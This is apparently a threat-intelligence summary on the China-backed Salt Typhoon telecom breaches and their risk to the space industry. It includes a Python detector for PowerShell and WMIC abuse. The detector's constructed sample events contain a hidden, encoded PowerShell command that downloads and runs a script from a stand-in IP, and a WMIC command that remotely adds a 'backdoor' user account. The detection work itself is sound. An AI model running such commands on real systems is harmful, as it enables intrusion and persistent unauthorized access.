Executive Summary
Over the past three months, U.S. Government officials have escalated warnings about cyberattacks targeting U.S. telecommunications firms and other U.S. critical infrastructure. These concerns center on the ongoing activities of Salt Typhoon (also known as Earth Estries), a China-backed advanced persistent threat (APT) group. Salt Typhoon has been blamed for what some members of Congress have called the most significant telecommunications hack in U.S. history, one that affected major telecom carriers and resulted in the theft of sensitive communications data, including call metadata and call detail records.
In addition to these breaches, U.S. officials report that Chinese hackers maintain persistent access to telecom systems supporting multiple critical infrastructure sectors. This access underscores the long-term espionage objectives of Chinese nation-state actors, with implications that extend beyond telecommunications to industries like space, defense, and aerospace.
To date, Salt Typhoon has compromised nine major U.S. telecom companies, breaching their systems and exfiltrating large volumes of sensitive data. Analysts report that the stolen data includes metadata on where, when, and with whom individuals were communicating, which gives adversaries a strategic advantage in intelligence gathering. The breaches have prompted urgent warnings from U.S. officials, who assess that nation-state actors have retained persistent access to telecom systems, enabling continuous surveillance and exploitation.
The pervasive nature of these campaigns stems from the ability of adversaries to exploit technical and operational weaknesses as an entry point into networks. Salt Typhoon actors typically gain initial access by exploiting unpatched, internet-facing network devices, then rely on "living-off-the-land" techniques to sustain long-term access to critical systems without deploying custom malware that defenders might recognize. These tactics have become core components of espionage campaigns against critical infrastructure sectors. Salt Typhoon's operations also use phishing and social engineering to entice users into handing over credentials for networks and devices. Once inside the target network, Salt Typhoon employs command and scripting interpreters to carry out follow-on activity, making extensive use of tools built into Windows environments, such as PowerShell and WMIC, so that its activity blends in with routine administration, evades detection, and maintains persistence in the compromised network. Earlier campaigns, such as Volt Typhoon (2023), show the same pattern of stealthy, persistent intrusions aimed at U.S. critical infrastructure, underscoring the growing concern about long-term campaigns designed to keep access to victim networks.
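Living-off-the-land activity of the kind described above still leaves traces in process-creation telemetry, because PowerShell and WMIC must be invoked with command lines that look different from routine administration. The following Python is an added detection example written for this page; it is not code from the report or from any referenced advisory. The event field names (host, user, parent_image, image, command_line) are an assumed, simplified shape loosely modelled on Sysmon Event ID 1 or Windows Security event 4688, not a vendor schema, and the three sample events are constructed, not real telemetry.

```python
"""Flag living-off-the-land process activity in constructed process-creation events:
WMIC remote process creation, encoded PowerShell, download cradles, and
interpreters spawned by Office applications.

Added example for this page, not tooling from the report. Event fields are an
assumed, simplified Sysmon Event ID 1 / Security 4688 shape."""
import base64
import binascii
import re
import shlex
from typing import Optional

# Constructed payload: what an attacker's encoded command might decode to.
_DECODED = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
_ENC = base64.b64encode(_DECODED.encode("utf-16-le")).decode()

# Constructed events (not real telemetry): one benign admin query, two suspicious.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\jdoe", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic os get caption"},
    {"host": "srv-mgmt", "user": "CORP\\svc-backup", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic /node:"fileserver01" process call create "cmd.exe /c net user backdoor P@ss1 /add"'},
    {"host": "ws02", "user": "CORP\\asmith",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -Enc {_ENC}"},
]

SUSPICIOUS_PS_TOKENS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                        "frombase64string", "net.webclient", "invoke-webrequest")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
INTERPRETERS = ("powershell.exe", "pwsh.exe", "wmic.exe", "cmd.exe", "wscript.exe", "cscript.exe")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable.
    PowerShell accepts -e, -ec and any unambiguous prefix of -EncodedCommand."""
    try:
        args = shlex.split(cmdline, posix=False)
    except ValueError:
        args = cmdline.split()
    for i, arg in enumerate(args[:-1]):
        a = arg.lower().lstrip("-/")
        if a in ("e", "ec") or (len(a) >= 3 and "encodedcommand".startswith(a)):
            try:
                raw = base64.b64decode(args[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (binascii.Error, ValueError, UnicodeDecodeError):
                return None  # argument present but not a valid encoded command
    return None


def detect(event: dict) -> list:
    """Return the names of the rules an event triggers (empty list if nothing fires)."""
    hits = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    inspect = cmd.lower()

    if image == "wmic.exe":
        # Lateral movement / remote execution through WMI: "/node:<host> process call create".
        if "/node:" in inspect and re.search(r"\bprocess\s+call\s+create\b", inspect):
            hits.append("wmic_remote_process_create")

    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("powershell_encoded_command")
            inspect = inspect + " " + decoded.lower()  # inspect the decoded script as well
        if re.search(r"-w(indowstyle)?\s+hidden", inspect) or re.search(r"-nop(rofile)?\b", inspect):
            hits.append("powershell_hidden_or_noprofile")
        # Word boundaries keep random base64 substrings from matching short tokens like "iex".
        if any(re.search(r"\b" + re.escape(tok) + r"\b", inspect) for tok in SUSPICIOUS_PS_TOKENS):
            hits.append("powershell_download_cradle")

    if parent in OFFICE_PARENTS and image in INTERPRETERS:
        hits.append("office_spawned_interpreter")  # classic phishing-document follow-on
    return hits


def scan(events: list) -> list:
    """Run detect() over every event; return (host, user, rules) for the ones that fire."""
    findings = []
    for e in events:
        hits = detect(e)
        if hits:
            findings.append((e["host"], e["user"], hits))
    return findings


if __name__ == "__main__":
    for host, user, rules in scan(SAMPLE_EVENTS):
        print(f"{host:10} {user:18} {', '.join(rules)}")
```

The benign `wmic os get caption` produces no finding, which is the point: the rules key on the arguments that distinguish remote execution and obfuscation from everyday administration, not on the presence of the binaries themselves. In a real deployment these checks would be expressed in the SIEM's query language over its own field names, with the encoded-command decoding done as an enrichment step so that analysts see the script text rather than a base64 blob.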
The scope of the Salt Typhoon campaign continues to expand, as the list of impacted companies grows to include large communications firms and internet service providers. Although the focus has been on telecommunications, the potential for cross-sector impact remains significant because of shared infrastructure and supply chain risk. Findings from a similar campaign reported by Trend Micro show that attacks on telecommunications companies exploited cloud servers and databases in addition to vendor networks. Investment in 5G and direct-to-device capabilities tightens the linkage between telecommunications firms and the commercial space industry. This growing overlap exposes the space industry to supply chain weaknesses in terrestrial infrastructure as a significant attack vector.
Space firms use routers, network devices, and management platforms like those exploited in the Salt Typhoon attacks. Exploitation of unpatched vulnerabilities in these devices could extend to satellite ground stations, command-and-control systems, and other mission-critical infrastructure. Additionally, the interconnected nature of supply chains between the telecom and space sectors means that compromised vendors in one industry can have cascading effects on the other.
Overall, the Salt Typhoon campaign is a stark reminder of the evolving threat landscape and the need for vigilance across all critical infrastructure sectors. For the space industry, the lesson from the telecom breaches is clear: shared vulnerabilities demand shared solutions. Communications providers should also follow the sector-specific guidance on visibility and hardening for communications infrastructure published jointly by DHS CISA and international partners on December 4, 2024. By adopting proactive security measures and collaborating with industry peers, space firms can strengthen their defenses against sophisticated, state-sponsored cyber adversaries.